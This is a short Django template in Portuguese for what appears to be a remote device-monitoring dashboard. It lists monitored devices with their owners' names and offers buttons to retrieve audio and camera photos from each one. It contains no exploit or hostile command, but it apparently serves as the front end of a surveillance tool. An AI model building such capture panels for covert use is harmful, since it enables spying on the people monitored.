{% extends "layout.html" %}

{% block body %}

<div class="page-header">
	<div class="container-fluid">
		<h1>
            {{conectados.count }} dispositivo{{conectados.count |pluralize }} monitorado{{conectados.count |pluralize }}

		</h1>



	</div>
</div>



	  <table class="table" >
        <thead>
          <tr>
            <th scope="col">Aparelho</th>
            <th scope="col">Pessoa</th>
              <th scope="col">Audio</th>
              <th scope="col">Camera</th>
          </tr>
        </thead>
        <tbody>

        {% for listar in conectados%}

          <tr>
            <th scope="row">{{listar.aparelho}}</th>

            <td>{{listar.nome}}</td>

              <td><a  href="{% url 'audio' listar.id %}" class = "btn btn-primary">audio</a></td>
                <td><a  href="{% url 'camera' listar.id %}" class = "btn btn-danger">foto</a></td>


          </tr>
    {% endfor %}
 </tbody>
      </table>

</div>

{% endblock body %}